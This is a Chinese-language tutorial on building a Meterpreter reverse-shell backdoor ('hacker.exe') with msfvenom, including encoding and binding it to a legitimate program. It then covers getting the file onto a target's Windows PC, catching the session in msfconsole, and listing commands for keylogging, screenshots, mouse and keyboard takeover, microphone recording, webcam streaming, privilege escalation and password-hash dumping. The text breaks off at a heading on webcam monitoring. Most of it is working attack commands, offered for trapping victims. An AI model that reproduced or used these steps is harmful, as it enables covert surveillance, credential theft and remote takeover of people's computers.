需要的工具
msfvenom、msfconsole
执行命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地IP> LPORT=<本地端口> -f exe -o hacker.exe
参数:
-p payloads
-f 输出格式
-o 输入地址
-e 编码方式(msfvenom -l -encoder 可以查看能使用的编码)
-x | -k 绑定程序 (例如 –x C:\nomal.exe –k –f exe –o C:\shell.exe)
即生成后门文件 hacker.exe
把它放到目标电脑上面(这里我放在WIN10 上面)
执行命令:(linux上运行需要)
chmod 777 hacker.exe (给予权限)
执行命令:
① msfconsole (运行msfconsole)
② msf > use exploit/multi/handler (选择模块)
③ msf exploit(handler) > exploit -z -j (后台执行)
这个时候等待目标打开我们的hacker.exe,打开即上钩了
④ msf exploit(handler) > sessions(查看上钩的用户)
⑤ msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)
⑥ meterpreter > shell (执行shell)
进入meterpreter之后即可进行一些相关木马操作
首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓
------------------------------------------------------------------------------------------------
用户操作:Stdapi: User interface Commands(用户接口命令)
enumdesktops -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop -->得到当前的Meterpreter桌面
idletime -->返回秒远程用户已经闲置数量keyscan_start -->开始捕获击键(开始键盘记录)
keyscan_dump -->转储按键缓冲(下载键盘记录)
keyscan_stop -->停止捕获击键(停止键盘记录)PS:键盘记录注意点,先开始,后下载,再结束,否则会出错
screenshot -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop -->改变meterpreters当前桌面
uictl -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)
摄像头:Stdapi: Webcam Commands(摄像头命令)
record_mic -->X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat -->开始视频聊天(视频,对方会有弹窗)
webcam_list -->单摄像头(查看摄像头列表)
webcam_snap -->采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream -->播放视频流从指定的摄像头(开启摄像头监控)
其他命令操作
getsystem -->获取高权限
hashdump -->获取当前用户hash
监控目标摄像头:
